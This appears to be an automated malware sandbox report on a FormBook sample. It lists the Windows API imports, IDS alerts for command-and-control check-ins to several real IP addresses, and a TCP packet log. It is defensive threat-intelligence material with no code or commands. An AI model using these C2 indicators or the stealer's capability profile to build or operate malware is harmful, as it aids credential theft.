GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-29T12:25:13.583844+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49744	80	192.168.2.6	62.149.128.40
2024-08-29T12:25:10.204310+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49743	80	192.168.2.6	62.149.128.40
2024-08-29T12:25:50.963342+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49753	80	192.168.2.6	65.21.196.90
2024-08-29T12:25:38.203800+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49750	80	192.168.2.6	18.162.124.14
2024-08-29T12:25:33.110271+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49747	80	192.168.2.6	18.162.124.14
2024-08-29T12:24:59.347693+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49740	80	192.168.2.6	35.244.245.121
2024-08-29T12:24:42.139531+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49735	80	192.168.2.6	199.59.243.226
2024-08-29T12:24:42.139531+0200	TCP	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	1	49735	80	192.168.2.6	199.59.243.226
2024-08-29T12:25:07.661982+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49742	80	192.168.2.6	62.149.128.40
2024-08-29T12:23:49.318401+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49725	80	192.168.2.6	91.184.0.200
2024-08-29T12:24:56.791562+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49739	80	192.168.2.6	35.244.245.121
2024-08-29T12:25:01.890347+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49741	80	192.168.2.6	35.244.245.121
2024-08-29T12:25:43.969232+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49751	80	192.168.2.6	65.21.196.90
2024-08-29T12:23:57.390269+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49727	80	192.168.2.6	3.33.130.190
2024-08-29T12:23:44.256371+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49723	80	192.168.2.6	91.184.0.200
2024-08-29T12:23:55.759943+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49726	80	192.168.2.6	3.33.130.190
2024-08-29T12:24:48.291355+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49737	80	192.168.2.6	199.59.243.226
2024-08-29T12:24:39.581037+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49734	80	192.168.2.6	199.59.243.226
2024-08-29T12:24:45.900451+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49736	80	192.168.2.6	199.59.243.226
2024-08-29T12:24:34.027077+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49730	80	192.168.2.6	3.33.130.190
2024-08-29T12:24:54.241146+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49738	80	192.168.2.6	35.244.245.121
2024-08-29T12:25:46.534498+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49752	80	192.168.2.6	65.21.196.90
2024-08-29T12:25:16.116110+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49745	80	192.168.2.6	62.149.128.40
2024-08-29T12:23:25.984476+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49719	80	192.168.2.6	198.57.245.28
2024-08-29T12:25:35.642394+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49748	80	192.168.2.6	18.162.124.14
2024-08-29T12:23:41.675094+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49722	80	192.168.2.6	91.184.0.200
2024-08-29T12:23:46.797589+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49724	80	192.168.2.6	91.184.0.200
2024-08-29T12:25:30.544492+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49746	80	192.168.2.6	18.162.124.14
2024-08-29T12:24:01.017199+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49728	80	192.168.2.6	3.33.130.190

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 12:23:25.404129982 CEST	49719	80	192.168.2.6	198.57.245.28
Aug 29, 2024 12:23:25.410243988 CEST	80	49719	198.57.245.28	192.168.2.6
Aug 29, 2024 12:23:25.410428047 CEST	49719	80	192.168.2.6	198.57.245.28
Aug 29, 2024 12:23:25.419553995 CEST	49719	80	192.168.2.6	198.57.245.28
Aug 29, 2024 12:23:25.425571918 CEST	80	49719	198.57.245.28	192.168.2.6
Aug 29, 2024 12:23:25.983807087 CEST	80	49719	198.57.245.28	192.168.2.6
Aug 29, 2024 12:23:25.984424114 CEST	80	49719	198.57.245.28	192.168.2.6
Aug 29, 2024 12:23:25.984476089 CEST	49719	80	192.168.2.6	198.57.245.28
Aug 29, 2024 12:23:25.987392902 CEST	49719	80	192.168.2.6	198.57.245.28
Aug 29, 2024 12:23:25.992762089 CEST	80	49719	198.57.245.28	192.168.2.6
Aug 29, 2024 12:23:41.049119949 CEST	49722	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:41.053946972 CEST	80	49722	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:41.054052114 CEST	49722	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:41.064968109 CEST	49722	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:41.069895029 CEST	80	49722	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:41.675009966 CEST	80	49722	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:41.675026894 CEST	80	49722	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:41.675093889 CEST	49722	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:42.574876070 CEST	49722	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:43.593534946 CEST	49723	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:43.598650932 CEST	80	49723	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:43.598735094 CEST	49723	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:43.609822989 CEST	49723	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:43.614660025 CEST	80	49723	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:44.256283045 CEST	80	49723	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:44.256303072 CEST	80	49723	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:44.256313086 CEST	80	49723	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:44.256371021 CEST	49723	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:45.121782064 CEST	49723	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:46.150363922 CEST	49724	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:46.155246019 CEST	80	49724	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:46.155360937 CEST	49724	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:46.164942980 CEST	49724	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:46.169876099 CEST	80	49724	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:46.169898987 CEST	80	49724	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:46.797147989 CEST	80	49724	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:46.797528982 CEST	80	49724	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:46.797589064 CEST	49724	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:47.668739080 CEST	49724	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:48.687486887 CEST	49725	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:48.692301035 CEST	80	49725	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:48.692383051 CEST	49725	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:48.700071096 CEST	49725	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:48.705024958 CEST	80	49725	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:49.316335917 CEST	80	49725	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:49.316517115 CEST	80	49725	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:49.318401098 CEST	49725	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:49.319242001 CEST	49725	80	192.168.2.6	91.184.0.200
Aug 29, 2024 12:23:49.325309038 CEST	80	49725	91.184.0.200	192.168.2.6
Aug 29, 2024 12:23:54.355686903 CEST	49726	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:23:54.360779047 CEST	80	49726	3.33.130.190	192.168.2.6
Aug 29, 2024 12:23:54.360865116 CEST	49726	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:23:54.372675896 CEST	49726	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:23:54.377450943 CEST	80	49726	3.33.130.190	192.168.2.6
Aug 29, 2024 12:23:55.759836912 CEST	80	49726	3.33.130.190	192.168.2.6
Aug 29, 2024 12:23:55.759943008 CEST	49726	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:23:55.887603045 CEST	49726	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:23:55.892534971 CEST	80	49726	3.33.130.190	192.168.2.6
Aug 29, 2024 12:23:56.913980007 CEST	49727	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:23:56.918924093 CEST	80	49727	3.33.130.190	192.168.2.6
Aug 29, 2024 12:23:56.919042110 CEST	49727	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:23:57.051069021 CEST	49727	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:23:57.056037903 CEST	80	49727	3.33.130.190	192.168.2.6
Aug 29, 2024 12:23:57.390032053 CEST	80	49727	3.33.130.190	192.168.2.6
Aug 29, 2024 12:23:57.390269041 CEST	49727	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:23:58.574914932 CEST	49727	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:23:58.579730034 CEST	80	49727	3.33.130.190	192.168.2.6
Aug 29, 2024 12:23:59.620842934 CEST	49728	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:23:59.625708103 CEST	80	49728	3.33.130.190	192.168.2.6
Aug 29, 2024 12:23:59.625799894 CEST	49728	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:23:59.636250973 CEST	49728	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:23:59.641053915 CEST	80	49728	3.33.130.190	192.168.2.6
Aug 29, 2024 12:23:59.641196966 CEST	80	49728	3.33.130.190	192.168.2.6
Aug 29, 2024 12:24:01.017137051 CEST	80	49728	3.33.130.190	192.168.2.6
Aug 29, 2024 12:24:01.017199039 CEST	49728	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:24:01.153068066 CEST	49728	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:24:01.157967091 CEST	80	49728	3.33.130.190	192.168.2.6
Aug 29, 2024 12:24:02.213191032 CEST	49730	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:24:02.219130039 CEST	80	49730	3.33.130.190	192.168.2.6
Aug 29, 2024 12:24:02.219233036 CEST	49730	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:24:02.226151943 CEST	49730	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:24:02.231118917 CEST	80	49730	3.33.130.190	192.168.2.6
Aug 29, 2024 12:24:34.026807070 CEST	80	49730	3.33.130.190	192.168.2.6
Aug 29, 2024 12:24:34.026825905 CEST	80	49730	3.33.130.190	192.168.2.6
Aug 29, 2024 12:24:34.027076960 CEST	49730	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:24:34.029679060 CEST	49730	80	192.168.2.6	3.33.130.190
Aug 29, 2024 12:24:34.034456015 CEST	80	49730	3.33.130.190	192.168.2.6
Aug 29, 2024 12:24:39.119918108 CEST	49734	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:39.124938965 CEST	80	49734	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:39.125015974 CEST	49734	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:39.136827946 CEST	49734	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:39.141658068 CEST	80	49734	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:39.580970049 CEST	80	49734	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:39.580986977 CEST	80	49734	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:39.580997944 CEST	80	49734	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:39.581037045 CEST	49734	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:40.653469086 CEST	49734	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:41.674011946 CEST	49735	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:41.679739952 CEST	80	49735	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:41.679821014 CEST	49735	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:41.693847895 CEST	49735	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:41.698697090 CEST	80	49735	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:42.138727903 CEST	80	49735	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:42.138798952 CEST	80	49735	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:42.138959885 CEST	80	49735	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:42.139530897 CEST	49735	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:43.229760885 CEST	49735	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:44.237473011 CEST	49736	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:45.246872902 CEST	49736	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:45.277771950 CEST	80	49736	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:45.277786970 CEST	80	49736	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:45.277863026 CEST	49736	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:45.277899981 CEST	49736	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:45.310560942 CEST	49736	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:45.315401077 CEST	80	49736	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:45.315468073 CEST	80	49736	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:45.900371075 CEST	80	49736	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:45.900403023 CEST	80	49736	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:45.900422096 CEST	80	49736	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:45.900450945 CEST	49736	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:45.900486946 CEST	49736	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:46.825078964 CEST	49736	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:47.830296040 CEST	49737	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:47.835336924 CEST	80	49737	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:47.835432053 CEST	49737	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:47.843380928 CEST	49737	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:47.849102974 CEST	80	49737	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:48.291115999 CEST	80	49737	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:48.291135073 CEST	80	49737	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:48.291150093 CEST	80	49737	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:48.291354895 CEST	49737	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:48.297823906 CEST	49737	80	192.168.2.6	199.59.243.226
Aug 29, 2024 12:24:48.302824020 CEST	80	49737	199.59.243.226	192.168.2.6
Aug 29, 2024 12:24:53.728928089 CEST	49738	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:24:53.733777046 CEST	80	49738	35.244.245.121	192.168.2.6
Aug 29, 2024 12:24:53.733869076 CEST	49738	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:24:53.745980978 CEST	49738	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:24:53.750792980 CEST	80	49738	35.244.245.121	192.168.2.6
Aug 29, 2024 12:24:54.240659952 CEST	80	49738	35.244.245.121	192.168.2.6
Aug 29, 2024 12:24:54.241034985 CEST	80	49738	35.244.245.121	192.168.2.6
Aug 29, 2024 12:24:54.241146088 CEST	49738	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:24:55.262902975 CEST	49738	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:24:56.282365084 CEST	49739	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:24:56.289849043 CEST	80	49739	35.244.245.121	192.168.2.6
Aug 29, 2024 12:24:56.289993048 CEST	49739	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:24:56.307312965 CEST	49739	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:24:56.312135935 CEST	80	49739	35.244.245.121	192.168.2.6
Aug 29, 2024 12:24:56.791420937 CEST	80	49739	35.244.245.121	192.168.2.6
Aug 29, 2024 12:24:56.791454077 CEST	80	49739	35.244.245.121	192.168.2.6
Aug 29, 2024 12:24:56.791562080 CEST	49739	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:24:57.809317112 CEST	49739	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:24:58.828622103 CEST	49740	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:24:58.833635092 CEST	80	49740	35.244.245.121	192.168.2.6
Aug 29, 2024 12:24:58.833832979 CEST	49740	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:24:58.846409082 CEST	49740	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:24:58.851448059 CEST	80	49740	35.244.245.121	192.168.2.6
Aug 29, 2024 12:24:58.851633072 CEST	80	49740	35.244.245.121	192.168.2.6
Aug 29, 2024 12:24:59.345627069 CEST	80	49740	35.244.245.121	192.168.2.6
Aug 29, 2024 12:24:59.345747948 CEST	80	49740	35.244.245.121	192.168.2.6
Aug 29, 2024 12:24:59.347692966 CEST	49740	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:25:00.357503891 CEST	49740	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:25:01.379502058 CEST	49741	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:25:01.384368896 CEST	80	49741	35.244.245.121	192.168.2.6
Aug 29, 2024 12:25:01.384542942 CEST	49741	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:25:01.391864061 CEST	49741	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:25:01.396747112 CEST	80	49741	35.244.245.121	192.168.2.6
Aug 29, 2024 12:25:01.886493921 CEST	80	49741	35.244.245.121	192.168.2.6
Aug 29, 2024 12:25:01.886873960 CEST	80	49741	35.244.245.121	192.168.2.6
Aug 29, 2024 12:25:01.890347004 CEST	49741	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:25:01.890347004 CEST	49741	80	192.168.2.6	35.244.245.121
Aug 29, 2024 12:25:01.895245075 CEST	80	49741	35.244.245.121	192.168.2.6
Aug 29, 2024 12:25:06.979794979 CEST	49742	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:06.984689951 CEST	80	49742	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:06.984761000 CEST	49742	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:07.002165079 CEST	49742	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:07.007065058 CEST	80	49742	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:07.661725998 CEST	80	49742	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:07.661753893 CEST	80	49742	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:07.661767960 CEST	80	49742	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:07.661781073 CEST	80	49742	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:07.661797047 CEST	80	49742	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:07.661808968 CEST	80	49742	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:07.661982059 CEST	49742	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:08.512885094 CEST	49742	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:09.531198025 CEST	49743	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:09.536665916 CEST	80	49743	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:09.536809921 CEST	49743	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:09.548841953 CEST	49743	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:09.554572105 CEST	80	49743	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:10.204216003 CEST	80	49743	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:10.204233885 CEST	80	49743	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:10.204246998 CEST	80	49743	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:10.204258919 CEST	80	49743	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:10.204272985 CEST	80	49743	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:10.204286098 CEST	80	49743	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:10.204309940 CEST	49743	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:10.204355001 CEST	49743	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:11.059537888 CEST	49743	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:12.081579924 CEST	49744	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:12.898454905 CEST	80	49744	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:12.898549080 CEST	49744	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:12.913516998 CEST	49744	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:12.918510914 CEST	80	49744	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:12.918528080 CEST	80	49744	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:13.583628893 CEST	80	49744	62.149.128.40	192.168.2.6
